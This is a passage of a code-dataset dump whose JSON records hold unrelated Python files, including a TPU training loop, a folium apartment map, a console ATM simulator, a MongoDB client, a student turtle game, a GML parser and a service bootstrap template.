0\n\n for step, (inputs, targets) in enumerate(train_queue):\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs, outputs_aux = net(inputs)\n loss = criterion(outputs, targets)\n\n loss.backward()\n nn.utils.clip_grad_norm_(net.parameters(), params[\"grad_clip\"])\n\n xm.optimizer_step(optimizer)\n\n net.apply(clip)\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n return correct, train_loss, total\n\n def infer(\n valid_queue: pl.ParallelLoader,\n net: torch.nn.Module,\n criterion: Callable,\n device: torch.device,\n ):\n \"\"\"\n Evaluation loop for a network.\n\n Args:\n valid_queue:\n net:\n criterion:\n device: pass the automatically assigned device via xm.spawn\n\n Returns:\n mean accuracy, mean loss\n \"\"\"\n\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for step, (inputs, targets) in enumerate(valid_queue):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs, _ = net(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n acc = 100.0 * correct / total\n\n return acc, test_loss / total\n\n def run():\n \"\"\"\n Main function to setup the training loop and evaluation loop.\n See comments for detailed explanation.\n\n Returns:\n None, but it saves the model weights and model performance, based on the get_map_fn arguments\n\n \"\"\"\n\n # xla will assign a device for each forked run of this function\n device = xm.xla_device()\n\n # determine if this fork is the master fork to avoid logging and print 8 times\n master = xm.is_master_ordinal()\n\n if master:\n logger.info(\"running at batch size %i\" % batch_size)\n\n criterion = nn.CrossEntropyLoss()\n\n criterion.to(device)\n model = WRAPPED_MODEL.to(device)\n\n # standard data prep\n CIFAR_MEAN = [0.49139968, 0.48215827, 0.44653124]\n CIFAR_STD = [0.24703233, 0.24348505, 0.26158768]\n\n train_transform = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip(),\n transforms.Normalize(CIFAR_MEAN, CIFAR_STD),\n ]\n )\n\n if args.cutout > 0:\n train_transform.transforms.append(Cutout(args.cutout))\n\n train_data = CifarDataset(transform=train_transform)\n\n # distributed samples ensure data is sharded to each tpu core\n # if you do not use this, you are only using 1 of the 8 cores\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_data,\n num_replicas=xm.xrt_world_size(),\n rank=xm.get_ordinal(),\n shuffle=True,\n )\n\n train_queue = torch.utils.data.DataLoader(\n train_data,\n batch_size=batch_size//xm.xrt_world_size(),\n sampler=train_sampler,\n drop_last=True,\n num_workers=0,\n )\n\n valid_transform = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize(CIFAR_MEAN, CIFAR_STD),\n ]\n )\n\n valid_data = my_cifar10.CIFAR10(\n root=data_root, train=False, download=False, transform=valid_transform\n )\n\n valid_sampler = torch.utils.data.distributed.DistributedSampler(\n valid_data,\n num_replicas=xm.xrt_world_size(),\n rank=xm.get_ordinal(),\n shuffle=False,\n )\n\n valid_queue = torch.utils.data.DataLoader(\n valid_data,\n sampler=valid_sampler,\n batch_size=batch_size//xm.xrt_world_size(),\n drop_last=True,\n num_workers=0,\n )\n\n # standard optimizer stuff\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n\n if args.opt == \"sgd\":\n\n optimizer = torch.optim.SGD(\n parameters,\n args.learning_rate,\n momentum=momentum,\n weight_decay=args.weight_decay,\n )\n elif args.opt == \"lamb\":\n optimizer = Lamb(\n parameters, lr=args.learning_rate, weight_decay=weight_decay\n )\n else:\n raise NameError(\"Unknown Optimizer %s\" % args.opt)\n\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, int(epochs))\n\n # training by epoch loop\n for epoch in range(epochs):\n\n # the model needs a droprate, so just assign it\n model.droprate = drop_path_prob * epoch / epochs\n\n start = datetime.datetime.now()\n st = start.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if master:\n logger.info(\"starting epoch %i at %s\" % (epoch, st))\n\n # parallel loader necessary to load data in parallel to each core\n para_loader = pl.ParallelLoader(train_queue, [device]).per_device_loader(\n device\n )\n correct, train_loss, total = train(\n para_loader, model, criterion, optimizer, params, device\n )\n\n train_acc = 100 * correct / total\n\n # collect the train accuracies from all cores\n train_acc = xm.mesh_reduce(\"avg acc\", train_acc, np.mean)\n\n end = datetime.datetime.now()\n duration = (end - start).total_seconds()\n\n if master:\n logger.info(\"train_acc %f duration %f\" % (train_acc, duration))\n\n scheduler.step()\n\n # validate using 8 cores and collect results\n valid_acc, valid_obj = infer(valid_queue, model, criterion, device)\n valid_acc = xm.mesh_reduce(\"val avg acc\", valid_acc, np.mean)\n\n if master:\n logger.info(\"valid_acc %f\" % valid_acc)\n\n # count flops\n _ = add_flops_counting_methods(model)\n model.eval()\n model.start_flops_count()\n random_data = torch.randn(1, 3, 32, 32)\n model(torch.autograd.Variable(random_data).to(device))\n n_flops = np.round(model.compute_average_flops_cost() / 1e6, 4)\n n_flops = xm.mesh_reduce(\"flops\", n_flops, np.mean)\n\n if master:\n logger.info(\"flops %f\" % n_flops)\n\n if master:\n logger.info(\"saving\")\n\n # save weights and results\n\n xm.save([valid_acc, n_flops], \"results.pt\")\n\n def mp_fn(rank, flags):\n torch.set_default_tensor_type(\"torch.FloatTensor\")\n run()\n\n return mp_fn\n","sub_path":"projectcode/training/tpu.py","file_name":"tpu.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132286844","text":"import pandas as pd\r\nimport folium\r\nfrom folium.plugins import MarkerCluster, Search, MiniMap\r\nfrom folium import IFrame\r\nimport os\r\ndata2 = pd.read_csv('blore_apartment_data.csv')\r\ndata1 = pd.read_csv('apartment_data.csv')\r\ndata1 = data1.drop(columns=\"geometry\")\r\ndata1['combined'] = list(zip(data1.lat, data1.lon))\r\nmax_records = 1125\r\nBAN_COORDINATES = (12.9716, 77.5946)\r\nmap1 = folium.Map(location=BAN_COORDINATES, zoom_start=12, max_zoom = 16)\r\nbangalore = os.path.join('bbmp.json')\r\nmap = MarkerCluster(control = False).add_to(map1)\r\nfor i in data1[0:max_records].iterrows():\r\n text = '

' + i[1]['names'] + '

'\r\n data3 = data2[data2.namesfull == i[1]['names']].loc[:, ['Price', 'Area', 'UnitType']]\r\n html = text + data3.to_html(classes=\"table table-striped table-hover table condensed table-responsive\",index=False)\r\n folium.Marker(\r\n popup = folium.Popup(html, max_width = 400),\r\n location = [i[1]['lat'],i[1]['lon']]\r\n ).add_to(map)\r\nbanglore_geo = folium.GeoJson(bangalore, name='bangalore',\r\n tooltip= folium.features.GeoJsonTooltip(fields= ['WARD_NAME', 'WARD_NO'],\r\n aliases= ['ward name','ward no'],\r\n labels=True,\r\n sticky=True\r\n )).add_to(map1)\r\nward_search = Search(layer=banglore_geo,\r\n geom_type='Polygon',\r\n placeholder='Search for banglore wards',\r\n collapsed=False,\r\n search_label='WARD_NAME'\r\n ).add_to(map1)\r\nward_no_search = Search(layer=banglore_geo,\r\n geom_type='Polygon',\r\n placeholder='Search for banglore ward_no',\r\n collapsed=False,\r\n search_label='WARD_NO',\r\n position = 'bottomright'\r\n ).add_to(map1)\r\nminimap = MiniMap(toggle_display=True,\r\n height = 200,\r\n width = 200,\r\n minimized = True\r\n )\r\n#t = Terminator()\r\n#map1.add_child(t)\r\nminimap.add_to(map1)\r\nfolium.LayerControl().add_to(map1)\r\n","sub_path":"test-project.py","file_name":"test-project.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129536729","text":"# -*-coding:utf-8-*-\n# __author__ = \"Morn\"\n# Date:2018/10/18\nimport os\nfrom time import sleep\nfrom prettytable import PrettyTable\nfrom prettytable import PLAIN_COLUMNS\nfrom atm.core import auth\nfrom atm.core import accounts\nfrom atm.core import get_base_dir\nfrom atm.core.manager import *\nmenu = \"\"\"\n ----------- Bank System -----------\n 1.账户信息\n 2.还款\n 3.取款\n 4.提现\n 5.转账\n 6.账单\n 7.管理\n q.退出\n \"\"\"\nuser = \"root\"\naccess_logger = logger.get_logger('access.log')\n\n\n@auth.login\ndef display():\n items_dic = {'id': '账户名', 'account': '账户余额', 'credit': '剩余额度', 'cre_line': '信用额度',\n 'expire_date': '过期时间'}\n get_accounts = accounts.get_accounts(user, *items_dic.keys())\n table = PrettyTable(['field1', 'field2']) # 表格输出用户信息\n table.set_style(PLAIN_COLUMNS)\n table.header = False\n table.align['field1'] = 'l'\n table.align['field2'] = 'l'\n for key in items_dic:\n cell = [items_dic[key], get_accounts[key]]\n table.add_row(cell)\n print(table)\n access_logger.info(\"%s 查看了自己的账户信息\" % user)\n sleep(2)\n\n\n@auth.login\ndef repay():\n while True:\n ret = draw_repay('repay')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n elif ret == 'clear':\n return\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['account']:\n if get_accounts['credit'] + user_input <= get_accounts['cre_line']:\n balance = get_accounts['account'] - user_input\n credit = get_accounts['credit'] + user_input\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"还款成功,您当前的余额为: \" + str(balance) + \" , 信用额度: \"\n + str(credit))\n print(\"3s后返回菜单\")\n sleep(3)\n else:\n print(\"您还款的金额大于您应还的金额,我们会将多余部分退到您的账户\")\n balance = get_accounts['account'] - (get_accounts['cre_line'] -\n get_accounts['credit'])\n credit = get_accounts['cre_line']\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"还款成功,您当前的余额为: \" + str(balance) + \" , 信用额度: \"\n + str(credit))\n print(\"3s后返回菜单\")\n sleep(3)\n access_logger.info(\"%s 执行了还款操作,还款金额: %s ,余额: %s,信用额度: %s。\" %\n (user, user_input, balance, credit))\n break\n else:\n print(\"对不起,还款金额大于当前账户余额,当前账户余额: \" +\n str(get_accounts['account']))\n continue\n\n\ndef draw_repay(business): # draw, withdraw,\n business_dic = {'repay': '还款', 'draw': '取款', 'withdraw': '提现', 'transfer': '转账'}\n get_accounts = accounts.get_accounts(user, 'account', 'credit', 'cre_line')\n if business == 'draw' or business == 'transfer':\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account']))\n elif business == 'withdraw':\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account'])\n + \", 信用额度: \" + str(get_accounts['credit']))\n elif business == 'repay':\n if get_accounts['credit'] == get_accounts['cre_line']:\n print(\"恭喜你,没有需要偿还的款项\")\n return 'clear'\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account'])\n + \", 需要还款金额: \" + str(get_accounts['cre_line'] - get_accounts['credit']))\n user_input = input(\"请输入%s金额[b:返回]:\" % business_dic[business])\n if user_input == 'b':\n return 'b'\n elif user_input == 'q':\n exit('byebye'.center(30, '-'))\n elif not user_input.isdigit():\n print('抱歉,错误输入,无法识别')\n return 'error'\n user_input = int(user_input)\n if user_input < 0:\n input('%s金额不能为负' % business_dic[business])\n return 'error'\n return user_input, get_accounts\n\n\n@auth.login\ndef draw(): # 扣除账户余额\n while True:\n ret = draw_repay('draw')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['account']:\n balance = get_accounts['account'] - user_input\n accounts.set_accounts(user, account=balance)\n print(\"取款成功,您当前的余额为: \" + str(balance))\n print(\"3s后返回菜单\")\n access_logger.info(\"%s 执行了取款操作。\" % user)\n sleep(3)\n break\n else:\n print(\"对不起,取款金额大于当前账户余额,当前账户余额: \" +\n str(get_accounts['account']))\n continue\n\n\n@auth.login\ndef withdraw():\n while True:\n ret = draw_repay('draw')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['credit']:\n credit = get_accounts['credit'] - user_input * (1 + 0.05)\n balance = get_accounts['account'] + user_input\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"提现成功,您当前的余额为: \" + str(balance) + \" , 当前的信用\"\n \"额度为: \" + str(credit))\n access_logger.info(\"%s 执行了提现操作,提现金额: %s,剩余额度: %s。\" % (user, user_input, credit))\n print(\"3s后返回菜单\")\n sleep(3)\n break\n else:\n print(\"对不起,提现金额大于当前账户信用额度,当前账户信用额度: \" +\n str(get_accounts['credit']))\n continue\n\n\n@auth.login\ndef transfer():\n while True:\n transfer_id_1 = input(\"请输入转账账号[暂不支持跨行转账] : \")\n transfer_id_2 = input(\"请再次输入转账账号 : \")\n if transfer_id_1.lower() == 'q' or transfer_id_2.lower() == 'q':\n return\n if transfer_id_1 != transfer_id_2:\n print(\"两次输入账号不一致,请核对后再次输入\")\n continue\n transfer_id = transfer_id_1\n base_dir = get_base_dir.get_base_dir()\n transfer_path = base_dir + r\"\\atm\\account\\\\\" + transfer_id + \".json\"\n if not os.path.exists(transfer_path):\n print(\"账户不存在,请核对后再次输入\")\n continue\n user_accounts = accounts.get_accounts(user)\n tar_accounts = accounts.get_accounts(transfer_id)\n ret = draw_repay('transfer')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= user_accounts['account']:\n user_balance = user_accounts['account'] - user_input\n accounts.set_accounts(user, account=user_balance)\n tar_balance = tar_accounts['account'] + user_input\n accounts.set_accounts(transfer_id, account=tar_balance)\n print(\"转账成功,您当前的余额为: \" + str(user_balance))\n access_logger.info(\"%s 执行了转账操作, 转账目标账户: %s ,转账金额: %s。\" % (user, transfer_id, user_input))\n print(\"3s后返回菜单\")\n sleep(3)\n break\n else:\n print(\"对不起,转账金额大于当前账户余额,当前账户余额: \" +\n str(get_accounts['account']))\n continue\n\n\n@auth.login\ndef bill():\n pass\n\n\n@auth.login\n@auth.authority\ndef manager():\n manager_dic = {'1': 'add_account', '2': 'change_credit', '3': 'frozen_account'}\n while True:\n manager_menu = \"\"\"\n1.添加账户\n2.修改额度\n3.冻结账户\nb.back\nq:quit\n \"\"\"\n print(manager_menu)\n user_input = input(\">>\").strip().lower()\n if user_input == 'q':\n exit('byebye'.center(30, '-'))\n elif user_input == 'b':\n return\n elif user_input in manager_dic.keys():\n eval(manager_dic[user_input])()\n else:\n print(\"无法识别,请重新输入\")\n\n\n@auth.login\ndef run():\n global user\n user = auth.get_user()\n while True:\n print(menu)\n menu_dic = {\n \"1\": \"display\",\n \"2\": \"repay\",\n \"3\": \"draw\",\n \"4\": \"withdraw\",\n \"5\": \"transfer\",\n \"6\": \"bill\",\n \"7\": \"manager\"}\n user_choice = input(\">>\").strip().lower()\n if user_choice == 'q':\n exit('byebye'.center(30, '-'))\n elif user_choice in menu_dic.keys():\n eval(menu_dic[user_choice])()\n else:\n print(\"输入错误\")\n\n\n","sub_path":"atm/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241656716","text":"from pprint import pprint\nfrom pymongo import MongoClient\n\n\nclass Mongo:\n def __init__(self, uri):\n self.client = MongoClient(uri)\n self.db = self.client.crawler\n self.articles = self.db.articles\n\n def print_one(self):\n pprint(self.articles.find_one())\n\n\ndef main():\n articles = Mongo('mongodb://localhost:27017/').articles\n pprint(articles.find_one())\n total = articles.estimated_document_count()\n print(f\"total: {total}\")\n vectors = articles.count_documents({'vector': {'$exists': True}})\n print(f\"vectors: {vectors}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py-crawl/mongoClient.py","file_name":"mongoClient.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159499839","text":"# https://programmers.co.kr/learn/courses/30/lessons/49994\n\n\ndef solution(dirs):\n answer = set()\n r = c = 5\n for d in dirs:\n tr, tc = r, c\n if d == \"U\":\n tr += 1\n elif d == \"D\":\n tr -= 1\n elif d == \"R\":\n tc += 1\n else:\n tc -= 1\n if 0 <= tr < 11 and 0 <= tc < 11:\n a = r * 11 + c\n b = tr * 11 + tc\n answer.add(121 * a + b if a > b else 121 * b + a)\n r, c = tr, tc\n return len(answer)\n\n\nprint(solution(\"LULLLLLLU\"))\n","sub_path":"programmers/laern/2018_winter_coding_02.py","file_name":"2018_winter_coding_02.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406276172","text":"from turtle import *\nimport turtle\nimport time\nimport random\nimport math\nfrom ball import Ball\n\ncolormode(255)\nhideturtle()\ntracer(0)\nturt = turtle.Turtle()\nRUNNING = True\nSLEEP = 0.0077\nJ = turtle.Canvas()\nSCREEN_WIDTH = J.winfo_width() / 2\nSCREEN_HEIGHT = J.winfo_height() / 2\n\nNUMBER_OF_BALLS = 5\nMINIMUM_BALL_RADIUS = 10\nMAXIMUM_BALL_RADIUS = 100\nMAXIMUM_BALL_DX = 5\nMINIMUM_BALL_DX = -5\n\nMINIMUM_BALL_DY = -5\nMAXIMUM_BALL_DY = 5\n\nballs = []\n# score = 0\n# scoret = turtle.clone()\nfor i in range(NUMBER_OF_BALLS):\n x = random.randint(int(-SCREEN_WIDTH + MAXIMUM_BALL_RADIUS),\n int(SCREEN_WIDTH - MAXIMUM_BALL_RADIUS))\n y = random.randint(int(-SCREEN_HEIGHT + MAXIMUM_BALL_RADIUS),\n int(SCREEN_HEIGHT - MAXIMUM_BALL_RADIUS))\n dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n while dx == 0:\n dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n\n while dy == 0:\n dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n\n radius = random.randint(MINIMUM_BALL_RADIUS, MAXIMUM_BALL_RADIUS)\n colour = (random.random(), random.random(), random.random())\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n\nnew_ball = Ball()\nballs.append(new_ball)\n\n\ndef move_all_balls():\n for variable in range(NUMBER_OF_BALLS):\n balls[variable].move(SCREEN_WIDTH, SCREEN_HEIGHT)\n\n\ndef check_collide(ball_a, ball_b):\n if ball_a == ball_b:\n return False\n\n distance = math.sqrt(\n math.pow(ball_a.x - ball_b.x, 2) + math.pow(ball_a.y - ball_b.y, 2))\n\n if distance + 10 < ball_a.r + ball_b.r:\n return True\n else:\n return False\n\n\ndef check_all_balls_collision():\n for ball_a in balls:\n for ball_b in balls:\n if check_collide(ball_a, ball_b) == True:\n radiusA = ball_a.r\n radiusB = ball_b.r\n random_x = random.randint(screen_random1_x, screen_random2_x)\n random_y = random.randint(screen_random1_y, screen_random2_y)\n random_dx = random.randint(minimum_ball_dx, maximum_ball_dx)\n while random_dx == 0:\n random_dx = random.randint(minimum_ball_dx,\n maximum_ball_dx)\n random_dy = random.randint(minimum_ball_dy, maximum_ball_dy)\n while random_dy == 0:\n random_dy = random.randint(minimum_ball_dy,\n maximum_ball_dy)\n radius = random.randint(minimum_ball_radius,\n maximum_ball_radius)\n color = (random.randint(0, 255), random.randint(0, 255),\n random.randint(0, 255))\n\n if radiusA > radiusB:\n ball_b.goto(random_x, random_y)\n ball_b.dx = random_dx\n ball_b.dy = random_dy\n ball_b.r = radius\n ball_b.shapesize(ball_b.r / 10)\n ball_b.color = color\n ball_a.r += 0.5\n ball_a.shapesize(ball_a.r / 10)\n\n elif radiusA < radiusB:\n ball_a.goto(random_x, random_y)\n ball_a.dx = random_dx\n ball_a.dy = random_dy\n ball_a.r = radius\n ball_a.shapesize(ball_a.r / 10)\n ball_a.color = color\n ball_b.r += 0.5\n ball_b.shapesize(ball_b.r / 10)\n\n\ndef check_myball_collision():\n score = 0\n scoret = turt.clone()\n for ball in balls:\n random_x = random.randint(screen_random1_x, screen_random2_x)\n random_y = random.randint(screen_random1_y, screen_random2_y)\n random_dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n while random_dx == 0:\n random_dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n random_dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n while random_dy == 0:\n random_dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n radius = random.randint(MINIMUM_BALL_RADIUS, MAXIMUM_BALL_RADIUS)\n color = (\n random.randint(0, 255), random.randint(0, 255),\n random.randint(0, 255))\n if check_collide(new_ball, ball) == True:\n radiusC = new_ball.r\n radiusD = ball.r\n\n if new_ball.r < ball.r:\n print(\"you suck, GAME OVER\")\n return False\n else:\n new_ball.r += 2\n new_ball.shapesize(new_ball.r / 10)\n score += 1\n scoret.pu()\n scoret.goto(0, 250)\n scoret.clear()\n scoret.write(\"SCORE: \" + str(score), align=\"center\",\n font=(\"Arial\", 20, \"normal\"))\n ball.goto(random_x, random_y)\n ball.dx = random_dx\n while ball.dx == 0:\n ball.dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n ball.dy = random_dy\n while ball.dy == 0:\n ball.dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n ball.r = radius\n ball.shapesize(ball.r / 10)\n ball.color = color\n return True\n\n\ndef movearound(event):\n x1 = event.x - SCREEN_WIDTH\n y1 = SCREEN_HEIGHT - event.y\n turtle.goto(x1, y1)\n\n\nturtle.getcanvas().bind(\"\", movearound)\nturtle.listen()\n\nwhile RUNNING == True:\n if SCREEN_WIDTH != (\n turtle.getcanvas().winfo_width() / 2) or SCREEN_HEIGHT != (\n turtle.getcanvas().winfo_height() / 2):\n SCREEN_WIDTH = (turtle.getcanvas().winfo_width() / 2)\n SCREEN_HEIGHT = (turtle.getcanvas().winfo_height() / 2)\n move_all_balls()\n # check_all_balls_collision()\n if check_myball_collision() == False:\n turtle.goto(0, 0)\n turtle.write(\"you suck, GAME OVER!\", align=\"center\",\n font=(\"Arial\", 50, \"normal\"))\n time.sleep(5)\n turtle.bye()\n getscreen().update()\n time.sleep(sleep)\nmainloop()\n\n#wtf with import turtle *\n#do i need to return something in the move.Ball function?\n#how to- color mode\n#what does get canvas do?\n#is the clone ok\n#is the indentation at the agario file ok\n#why when i try to create a new_ball object , while using the class Ball it says that i applied less arguments than it requiers \n","sub_path":"agario.py","file_name":"agario.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251035605","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\npygml for parsing GML files (ISO19136)\n\"\"\"\n\n__title__ = 'pygml'\n__author__ = 'Jürgen Weichand'\n__version__ = '0.3.1'\n__license__ = 'Apache 2.0'\n__copyright__ = 'Copyright 2015 Jürgen Weichand'\n\n\nfrom collections import OrderedDict\nimport logging\nimport os\nimport re\nimport tempfile\nimport json\n\n#from extlib.pygml.xmltodict import xmltodict\nfrom .xmltodict import *\n\n\nclass GmlException(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return repr(self.message)\n\n\ndef getTempfile(filename):\n tmpdir = tempfile.gettempdir()\n if not os.path.exists(tmpdir):\n os.makedirs(tmpdir)\n tmpfile = os.path.join(tmpdir, filename)\n return tmpfile\n\n\nclass Dataset():\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logfile = getTempfile('pygml.log')\n logging.basicConfig(filename=logfile, level=logging.ERROR, format=logformat)\n logging.debug(dir())\n geometry_name_matcher = re.compile('(?:^|:)(?:geometry|position|the_geom)', re.IGNORECASE)\n\n def __init__(self, filename, resolve_xlink_href=True):\n\n def is_geometry(key):\n return self.geometry_name_matcher.search(key) != None\n\n def postprocessor(path, key, value):\n # remove wfs namespace\n key = key.replace('wfs:', '')\n\n # normalize FeatureCollection, member, featureMember, featureMembers\n if 'feature' in str(key.lower()) or 'member' in str(key.lower()):\n key = key.replace('gml:', '')\n\n if not is_geometry(key):\n return key, value\n\n features = {}\n f = open(filename, mode='rb')\n logging.info('Open file %s' % filename)\n features = xmltodict.parse(f, postprocessor=postprocessor)\n f.close()\n\n # logging.info(json.dumps(features, indent=3))\n logging.debug('Container type(%s)' % str(type(features)))\n logging.debug('Container %s' % [features.keys()][0])\n\n # convert single feature (count=1 or maxFeatures=1) to list\n def prepare(features):\n if type(features) == OrderedDict:\n return [features]\n return features\n\n self.__features = None\n\n # INSPIRE GML 3.2\n if 'base:SpatialDataSet' in features:\n self.__features = features['base:SpatialDataSet']['base:member']\n\n # WFS or GML\n if 'FeatureCollection' in features:\n\n # GML 3.2\n if 'member' in features['FeatureCollection']:\n self.__features = prepare(features['FeatureCollection']['member'])\n try:\n self.__features.extend(features['FeatureCollection']['additionalObjects']['SimpleFeatureCollection']['member'])\n except KeyError:\n pass\n # GML 3.1\n if 'featureMembers' in features['FeatureCollection']:\n list = []\n for key in features['FeatureCollection']['featureMembers'].keys():\n for value in features['FeatureCollection']['featureMembers'][key]:\n dict = OrderedDict()\n dict[key] = value\n list.append(dict)\n self.__features = list\n # GML 2.0\n if 'featureMember' in features['FeatureCollection']:\n self.__features = prepare(features['FeatureCollection']['featureMember'])\n\n if not self.__features:\n raise GmlException('Unsupported GML-Container!')\n\n logging.debug('Container type(%s)' % str(type(self.__features)))\n\n if resolve_xlink_href:\n logging.info('Resolving xlink:href references')\n self.__resolve(self.__features)\n\n def getFeatures(self):\n logging.debug('getFeatures()')\n logging.debug('type(getFeatures()) = %s' % type(self.__features))\n return self.__features\n\n #TODO: auf das erste tupe zugreifen und prüfen ob @fid oder @gml:id enthalten ist ('@gml:id','Name')\n # - scheint nicht ordnungsgemäß auf das dict zuzugreifen\n def getFeature(self, id):\n logging.debug('getFeature(%s)' % id)\n features = self.getFeatures()\n \n for feature in features:\n for gml_id in ['@fid', '@gml:id']:\n if gml_id in list(feature.values())[0]:\n if list(feature.values())[0][gml_id] == id:\n return feature\n return None\n\n def __resolve(self, value):\n if type(value) == OrderedDict:\n for key, val in sorted(value.items()):\n if 'xlink:href' in key:\n logging.debug('Resolving %s' % val)\n val = val.replace('#', '')\n feature = self.getFeature(val)\n if feature:\n logging.debug('Successful resolved %s' % val)\n # value['@xlink:href'] = feature\n value['@xlink:href [resolved]'] = feature\n else:\n logging.debug('Unable to resolve %s' % val)\n pass\n else:\n self.__resolve(val)\n\n if type(value) == list:\n for val in value:\n self.__resolve(val)","sub_path":"pygml/pygml.py","file_name":"pygml.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500679745","text":"from typing import List\n\nfrom src.service.template.bootstrap import Bootstrap\nfrom src.auth import router as auth\n\nfrom src.service.template.bootstrap import LOADABLE_REDIS, LOADABLE_RABBITMQ, LOADABLE_SENTRY, LOADABLE_SOCKET, \\\n LOADABLE_FASTAPI, LOADABLE_MONGO\n\nfrom src.service.template.drivers.services.logging import LoggingService, LogSearch\nfrom src.service.template.utils.state import State\n\n\"\"\"\nSECTION: CONFIGURATION AND SETUP\n\nTHESE VARIABLES ARE EXTREMELY IMPORTANT AND MUST BE SET FOR EACH SERVICE\n\"\"\"\n\n\"\"\"\nloadables\nThis defines which drivers should be loaded when the service runs\nEach driver has an associated constant\nAdd the applicable constant to the list for the drivers you wish to use\n\"\"\"\nloadables = [LOADABLE_RABBITMQ, LOADABLE_SENTRY, LOADABLE_FASTAPI, LOADABLE_MONGO]\n\n\"\"\"\nservice_name\nThe name of this service\n\"\"\"\nservice_name = \"Authentication Service\"\n\n\"\"\"\nservice_key\nThe 'key' name of this server. It should be all lowercase and without any spaces or special symbols.\nThis name is used for the path to the configuration for this service\n\"\"\"\nservice_key = \"auth\"\n\n\"\"\"\nservice_version\nThis is the version of the service\n\"\"\"\nservice_version = \"0.1.0\"\n\n\"\"\"\nconfigs\nThis is used to define the names (including .yaml) of other configuraiton files you would like to have the application\n load for you.\nIf you are satisfied with the app.yaml and bootstrap.yaml configuration files, leave this value at None\n\"\"\"\nconfigs: List[str] = None\n\n\"\"\"\ndev_mode\nThis can either be toggled here or by launching the application with the `--dev` argument\nDev mode will preform tests on each driver, run the fastapi dev server if fastapi is enabled, and use the alternate\n configuration files\n\"\"\"\ndev_mode: bool = False\n\n\"\"\"\nconfig_path\nThis is an override for the configuration path\nIt is very unlikely that you should need to change this, but if you have configs stored somewhere else and this\n makes it convenient, go for it. \n\"\"\"\nconfig_path: str = None\n\n\"\"\"\nSECTION: BOOTSTRAPPING\n\"\"\"\n\n\nclass ServiceBootstrap(Bootstrap):\n \"\"\"\n This class sets up the entire service\n \n There are plenty of methods you can override in this class.\n Most of these methods have defaults that just work. However, in the case of custom functionality or more control\n just override them.\n The methods which you are most likely to require have a '!' to the left of their name\n\n Note: If you do not override post_load, the application will end immediately if you are not using fast api\n \n pre_load()\n * This method is called prior to any drivers being loaded\n\n sentry_init()\n * This method is used to setup sentry\n\n fastapi_init()\n * This method is used to setup fastapi\n\n ! fastapi_middleware()\n * This method is used to inject middleware into fastapi\n\n ! fastapi_routers()\n * This method is used to inject routers into fastapi\n\n socket_init()\n * This method is used to setup socket io\n\n redis_init()\n * This method is used to setup redis\n\n mongo_init()\n * This method is used to setup mongo\n\n rabbitmq_init()\n * This method is used to setup rabbitmq\n\n ! fastapi_register_endpoints()\n * This method is used to define extra endpoints for fastapi which are not already in a router\n\n ! socket_register_events()\n * This method is used to define all of your socket io events\n\n ! post_load()\n * This method is called after all of the drivers have been loaded\n * In other words, this method should be 